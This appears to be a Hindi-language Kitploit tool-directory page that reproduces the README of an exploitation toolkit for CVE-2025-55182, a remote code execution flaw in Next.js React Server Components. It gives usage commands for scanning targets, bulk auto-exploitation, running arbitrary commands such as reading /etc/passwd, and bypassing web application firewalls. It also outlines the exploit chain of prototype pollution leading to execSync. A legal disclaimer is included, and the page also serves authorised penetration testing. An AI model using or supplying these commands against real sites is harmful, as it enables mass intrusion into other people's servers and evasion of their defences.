Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC | Kitploit
उपकरण/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-55182 शोषण उपकरण

Next.js React Server Components रिमोट कोड एक्ज़ीक्यूशन भेद्यता (CVE-2025-55182) के परीक्षण के लिए एक व्यापक सुरक्षा अनुसंधान उपकरण।

अवलोकन

यह टूलकिट CVE-2025-55182 के लिए स्वचालित पहचान और शोषण क्षमताएँ प्रदान करता है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों को प्रभावित करने वाली एक गंभीर RCE भेद्यता है। टूलकिट में तीन एकीकृत घटक शामिल हैं:

  • NextApp.py - बुद्धिमान Next.js अनुप्रयोग फिंगरप्रिंटिंग स्कैनर
  • exploit.sh - एकल या बल्क लक्ष्यों के लिए लचीला शोषण उपकरण
  • auto_exploit.sh - एंड-टू-एंड स्वचालित स्कैनिंग और शोषण ऑर्केस्ट्रेटर

विशेषताएँ

  • बहु-स्तरीय पहचान: हेडर विश्लेषण, बॉडी स्कैनिंग और JavaScript फिंगरप्रिंटिंग
  • कॉन्फिडेंस स्कोरिंग: गलत सकारात्मक परिणामों को कम करने के लिए बुद्धिमान वर्गीकरण (उच्च/मध्यम/निम्न)
  • WAF बायपास: सामान्य वेब एप्लिकेशन फ़ायरवॉल से बचने के लिए अंतर्निहित तकनीकें
  • बल्क स्कैनिंग: विस्तृत रिपोर्टिंग के साथ कई लक्ष्यों को कुशलतापूर्वक संसाधित करें
  • स्वचालित वर्कफ़्लो: एक-कमांड पहचान और शोषण
  • विस्तृत रिपोर्टिंग: वर्गीकृत परिणामों के साथ व्यापक आउटपुट फ़ाइलें

आवश्यकताएँ

Python घटक

  • Python 3.x
  • requests लाइब्रेरी
root@kitploit:~
pip3 install requests

Bash घटक

  • curl
  • openssl
  • मानक Unix उपयोगिताएँ (sed, grep, awk, mktemp)

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

उपयोग

त्वरित आरंभ (अनुशंसित)

लक्ष्यों को स्कैन और शोषण करने का सबसे तेज़ तरीका:

root@kitploit:~
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"

केवल पहचान

शोषण के बिना Next.js अनुप्रयोगों की पहचान करें:

root@kitploit:~
python3 NextApp.py targets.txt

आउटपुट फ़ाइलें:

  • confirmed_nextjs_targets.txt - सभी पहचाने गए Next.js अनुप्रयोग
  • high_confidence_nextjs_targets.txt - केवल उच्च-कॉन्फिडेंस पहचान

एकल लक्ष्य शोषण

व्यक्तिगत लक्ष्यों का परीक्षण करें:

root@kitploit:~
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k

बल्क शोषण

विकल्प 1: एकीकृत वर्कफ़्लो (अनुशंसित)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

विकल्प 2: दो-चरणीय मैनुअल वर्कफ़्लो

root@kitploit:~
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"

उन्नत विकल्प

root@kitploit:~
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

कमांड संदर्भ

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

तर्क:

  • targets_file - लक्ष्य URL वाली टेक्स्ट फ़ाइल (प्रति पंक्ति एक)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONS]

विकल्प:

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONS]

विकल्प:

आउटपुट फ़ाइलें

confirmed_nextjs_targets.txt

NextApp.py द्वारा उत्पन्न - इसमें वे सभी URL शामिल हैं जिन्हें Next.js अनुप्रयोगों के रूप में पहचाना गया है।

high_confidence_nextjs_targets.txt

NextApp.py द्वारा उत्पन्न - इसमें केवल उच्च-कॉन्फिडेंस Next.js पहचान (100+ कॉन्फिडेंस स्कोर) शामिल हैं।

exploit_results.txt

auto_exploit.sh द्वारा उत्पन्न - व्यापक शोषण रिपोर्ट जिसमें शामिल हैं:

  • कमांड आउटपुट के साथ भेद्य लक्ष्य
  • गैर-भेद्य लक्ष्य
  • त्रुटियाँ और उनका विवरण
  • सारांश आँकड़े

पहचान पद्धति

स्कैनर एक कॉन्फिडेंस स्कोरिंग प्रणाली के साथ कई पहचान तकनीकों का उपयोग करता है:

हेडर विश्लेषण (प्रत्येक 50 अंक)

  • Next.js विशिष्ट हेडर: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • सर्वर: Vercel

बॉडी स्कैनिंग

  • __NEXT_DATA__ उपस्थिति (100 अंक)
  • Next.js buildId पैटर्न (50 अंक)
  • _next/* एसेट पथ (मात्रा के आधार पर 25-75 अंक)

JavaScript फिंगरप्रिंटिंग (60 अंक)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

कॉन्फिडेंस सीमाएँ:

  • उच्च (100+): कई मजबूत संकेतक
  • मध्यम (75-99): कई मध्यम संकेतक
  • निम्न (50-74): न्यूनतम साक्ष्य
  • 50 से नीचे: गलत सकारात्मक के रूप में अस्वीकृत

शोषण तंत्र

यह शोषण Next.js React Server Components में एक प्रोटोटाइप प्रदूषण श्रृंखला का लाभ उठाता है:

  1. नेस्टेड पेलोड के साथ मल्टीपार्ट फॉर्म डेटा तैयार करता है
  2. JSON डिसीरियलाइज़ेशन के माध्यम से __proto__ श्रृंखला को प्रदूषित करता है
  3. _response._prefix में मनमाना JavaScript इंजेक्ट करता है
  4. process.mainModule.require('child_process').execSync() के माध्यम से कमांड निष्पादित करता है
  5. X-Action-Redirect हेडर से परिणाम निकालता है
  6. URL-डिकोड करता है और आउटपुट को प्रारूपित करता है

WAF बायपास तकनीकें

टूलकिट में अंतर्निहित WAF बायपास क्षमताएँ शामिल हैं:

  • जंक डेटा इंजेक्शन: आकार-आधारित फ़िल्टर को बायपास करने के लिए यादृच्छिक डेटा जोड़ता है
  • डायनामिक बाउंड्रीज़: यादृच्छिक मल्टीपार्ट बाउंड्रीज़
  • अनुरोध ID रैंडमाइज़ेशन: प्रत्येक अनुरोध के लिए अद्वितीय ID
  • कॉन्फ़िगर करने योग्य आकार: समायोज्य जंक डेटा आकार (डिफ़ॉल्ट 128KB)

-w या --waf-bypass फ्लैग के साथ सक्षम करें।

उदाहरण

वेब अनुप्रयोग को स्कैन और शोषण करें

root@kitploit:~
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt

WAF बायपास के साथ एकल लक्ष्य का परीक्षण करें

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

केवल उच्च-कॉन्फिडेंस लक्ष्य

root@kitploit:~
# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

कानूनी अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ताओं को:

  • ✅ किसी भी सिस्टम का परीक्षण करने से पहले स्पष्ट लिखित अनुमति प्राप्त करें
  • ✅ केवल अधिकृत पेनेट्रेशन टेस्टिंग कार्यों में उपयोग करें
  • ✅ सभी लागू कानूनों और विनियमों का पालन करें
  • ✅ रक्षात्मक सुरक्षा अनुसंधान और CTF प्रतियोगिताओं के लिए उपयोग करें

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।

भेद्यता जानकारी

  • CVE ID: CVE-2025-55182
  • प्रभावित: Next.js React Server Components
  • प्रकार: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • गंभीरता: गंभीर

श्रेय

उन सुरक्षा शोधकर्ताओं का धन्यवाद जिन्होंने इस भेद्यता की खोज और खुलासा किया:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने परिवर्तन कमिट करें
  4. एक पुल अनुरोध सबमिट करें

सहायता

समस्याओं, प्रश्नों या फीचर अनुरोधों के लिए, कृपया GitHub पर एक issue खोलें।

लाइसेंस

यह प्रोजेक्ट शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। जिम्मेदारी और नैतिक रूप से उपयोग करें।

टूल डाउनलोड करें
OptionDescriptionDefault
-d, --domainलक्ष्य डोमेन/URLhttp://localhost:3000
-f, --fileलक्ष्य सूची वाली फ़ाइल-
-c, --commandनिष्पादित करने के लिए कमांडid
-w, --waf-bypassWAF बायपास सक्षम करेंअक्षम
--waf-size SIZEWAF बायपास डेटा आकार (KB)128
--timeout SECONDSअनुरोध टाइमआउट15
-k, --insecureSSL सत्यापन छोड़ेंअक्षम
--user-agent AGENTकस्टम User-AgentMozilla/5.0...
-h, --helpसहायता संदेश दिखाएँ-
OptionDescriptionDefault
-i, --input FILEइनपुट लक्ष्य फ़ाइलconfirmed_nextjs_targets.txt
-o, --output FILEआउटपुट परिणाम फ़ाइलexploit_results.txt
-c, --command CMDनिष्पादित करने के लिए कमांडid
-w, --waf-bypassWAF बायपास सक्षम करेंअक्षम
--waf-size SIZEWAF बायपास आकार (KB)128
--timeout SECONDSअनुरोध टाइमआउट15
-k, --insecureSSL सत्यापन छोड़ेंअक्षम
--delay SECONDSअनुरोधों के बीच देरी2
-s, --scanपहले Next.js के लिए ऑटो-स्कैन करेंअक्षम
-h, --helpसहायता संदेश दिखाएँ-